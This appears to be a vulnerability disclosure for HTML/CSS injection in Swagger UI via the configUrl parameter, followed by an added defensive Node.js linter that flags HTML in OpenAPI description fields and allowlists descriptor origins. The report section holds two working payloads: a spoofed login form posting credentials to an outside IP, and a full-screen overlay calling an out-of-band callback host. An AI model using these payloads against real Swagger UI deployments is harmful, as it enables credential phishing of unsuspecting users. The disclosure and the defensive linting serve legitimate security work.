- Software: swagger-ui
- Version: 2 and 3.0
- Business Area: SmartBear — API & Developer Tools
- Vendor: https://swagger.io/tools/swagger-ui/
- Presentation: HTML/CSS injection — via configUrl parameter
- Security vulnerability: HTML/CSS injection in info.description rendered by Swagger UI (UI spoofing / credential harvesting)
- Vulnerability Type: HTML/CSS injection (content/UI spoofing) — if JS executes, classify as XSS (CWE-79)
- Affected Component: Swagger UI — configUrl external descriptor loader / info.description rendering (e.g. https://petstore.swagger.io/?configUrl=...)
- Proof-of-concept descriptor (loaded via configUrl): https://raw.githubusercontent.com/carlosalbertotuma/swagger-ui/refs/heads/main/xss2.yaml
<form><math><mtext></form><form><div><center><b>Valid credentials:</b><form name="login" action="http://192.168.100.73:4444/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"></td></tr><tr><td>Password:</td><td><input type="password" name="password"></td></tr><tr><td colspan="2" align="center"><input type="submit" value="Login"></td></tr></table></form></center></div> ...
<form><math><mtext></form><form><div style="position:fixed;inset:0;display:flex;justify-content:center;align-items:center;z-index:9999;background:rgba(255,255,255,0.95);"><img src="https://n4sons7mmcl75ec49tdz2md21t7kvej3.oastify.com" alt="Test Image" style="max-width:90vw;max-height:90vh;border:4px solid #000;border-radius:8px;"/><div style="margin-left:0.5rem;font-family:Arial,sans-serif;font-size:14px;color:#333;">Test image loaded via descriptor info.description.</div></form></div>
...
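As an added defender-side example (not part of this report and not Swagger UI's own code), the following Node.js script lints an OpenAPI descriptor before it is published or referenced from a configUrl: it walks every `description`, `summary` and `title` field (Swagger UI renders these as Markdown, which permits inline HTML), reports any HTML tags found, treats form, input, math, img and similar tags as blocking findings, and separately checks that a descriptor URL comes from an allowlisted HTTPS origin. The field names, the tag list, the allowlist and the sample descriptor are assumptions made for this example.

```javascript
// Added example (not from the original report or from Swagger UI): a
// pre-deployment lint that walks an OpenAPI descriptor and flags HTML
// markup in free-text fields that Swagger UI renders as Markdown.
// Field names, tag list and the sample descriptor below are assumptions.

const MARKDOWN_FIELDS = new Set(['description', 'summary', 'title']);

// Tags that have no business in an API description; any other tag is
// still reported, just at lower severity.
const HIGH_RISK_TAGS = new Set([
  'form', 'input', 'button', 'math', 'mtext', 'img', 'svg', 'iframe',
  'script', 'style', 'object', 'embed', 'link', 'meta', 'base',
]);

// Matches an opening or closing HTML tag and captures its name.
const TAG_RE = /<\s*\/?\s*([a-z][a-z0-9-]*)[^>]*>/gi;

// Recursively collect findings: { path, tags, severity } for every
// Markdown-rendered string that contains HTML tags.
function findHtmlInDescriptor(doc, path = '$', out = []) {
  if (Array.isArray(doc)) {
    doc.forEach((v, i) => findHtmlInDescriptor(v, `${path}[${i}]`, out));
  } else if (doc && typeof doc === 'object') {
    for (const [k, v] of Object.entries(doc)) {
      const childPath = `${path}.${k}`;
      if (MARKDOWN_FIELDS.has(k) && typeof v === 'string') {
        const tags = new Set();
        for (const m of v.matchAll(TAG_RE)) tags.add(m[1].toLowerCase());
        if (tags.size) {
          const high = [...tags].filter((t) => HIGH_RISK_TAGS.has(t));
          out.push({
            path: childPath,
            tags: [...tags],
            severity: high.length ? 'high' : 'low',
          });
        }
      } else {
        findHtmlInDescriptor(v, childPath, out);
      }
    }
  }
  return out;
}

// Origin allowlist for the descriptor URL itself: Swagger UI should only
// be pointed at descriptors served over HTTPS from hosts you control.
function isAllowedDescriptorUrl(url, allowedOrigins) {
  let u;
  try {
    u = new URL(url);
  } catch {
    return false;
  }
  return u.protocol === 'https:' && allowedOrigins.includes(u.origin);
}

// Constructed sample descriptor (not the report's xss2.yaml): one
// description carrying markup of the kind the report describes and one
// carrying only harmless inline formatting.
const SAMPLE_DESCRIPTOR = {
  openapi: '3.0.0',
  info: {
    title: 'Pet Store',
    description: 'Valid credentials: <form name="login"><input type="text"></form>',
  },
  paths: {
    '/pets': {
      get: {
        summary: 'List pets',
        description: 'Returns **all** pets. See <b>docs</b>.',
      },
    },
  },
};

// Lint entry point: returns all findings and whether publication should
// be blocked (any high-severity finding).
function lint(doc) {
  const findings = findHtmlInDescriptor(doc);
  return { findings, block: findings.some((f) => f.severity === 'high') };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(lint(SAMPLE_DESCRIPTOR), null, 2));
}
```

Run against the sample, the lint blocks on `$.info.description` (form and input tags) and reports `$.paths./pets.get.description` at low severity for the bold tag. Inline HTML inside Markdown code spans is also flagged, which is an accepted false positive for a pre-publication gate. On the Swagger UI side, loading of query-string parameters such as configUrl and url is governed by the `queryConfigEnabled` option; deployments that do not need it should leave it disabled so that a visitor cannot make the UI fetch and render an arbitrary descriptor.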